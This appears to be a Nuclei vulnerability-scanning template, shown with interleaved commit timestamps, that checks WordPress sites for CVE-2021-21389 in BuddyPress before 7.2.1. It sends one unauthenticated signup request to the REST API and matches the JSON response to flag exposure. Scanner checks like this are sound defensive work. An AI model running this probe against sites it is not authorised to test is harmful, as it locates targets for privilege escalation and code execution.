2021-06-21 05:33:14 +00:00
id : CVE-2021-21389
info :
2022-06-27 18:36:15 +00:00
name : BuddyPress REST API <7.2.1 - Privilege Escalation/Remote Code Execution
2021-06-21 05:33:14 +00:00
author : lotusdll
2021-09-10 11:26:40 +00:00
severity : high
2022-06-27 18:36:15 +00:00
description : WordPress BuddyPress before version 7.2.1 is susceptible to a privilege escalation vulnerability that can be leveraged to perform remote code execution.
2021-08-18 11:37:49 +00:00
reference :
2021-06-21 05:33:14 +00:00
- https://github.com/HoangKien1020/CVE-2021-21389
2021-08-01 06:16:33 +00:00
- https://buddypress.org/2021/03/buddypress-7-2-1-security-release/
- https://codex.buddypress.org/releases/version-7-2-1/
- https://github.com/buddypress/BuddyPress/security/advisories/GHSA-m6j4-8r7p-wpp3
2022-06-27 16:51:29 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-21389
2023-04-12 10:55:48 +00:00
remediation : This issue has been remediated in WordPress BuddyPress 7.2.1.
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 8.8
2021-09-10 11:26:40 +00:00
cve-id : CVE-2021-21389
cwe-id : CWE-863
2023-07-11 19:49:27 +00:00
epss-score : 0.77888
cpe : cpe:2.3:a:buddypress:buddypress:*:*:*:*:*:wordpress:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
framework : wordpress
vendor : buddypress
product : buddypress
tags : cve,cve2021,wordpress,wp-plugin,rce,wp,buddypress
2021-06-21 05:33:14 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-06-23 20:54:58 +00:00
- raw :
- |
POST /wp-json/buddypress/v1/signup HTTP/1.1
Host : {{Hostname}}
Content-Type : application/json; charset=UTF-8
{
"user_login" : "{{randstr}}" ,
"password" : "{{randstr}}" ,
"user_name" : "{{randstr}}" ,
2022-06-06 10:40:15 +00:00
"user_email" : "{{randstr}}@interact.sh"
2021-06-23 20:54:58 +00:00
}
2021-06-21 05:33:14 +00:00
matchers-condition : and
matchers :
2021-06-23 20:54:58 +00:00
- type : word
2022-06-28 02:54:18 +00:00
part : body
2021-06-23 20:54:58 +00:00
words :
- "user_login"
- "registered"
- "activation_key"
- "user_email"
condition : and
2022-06-27 16:51:29 +00:00
2022-06-28 02:54:18 +00:00
- type : word
part : header
words :
- "application/json"
- type : status
status :
- 200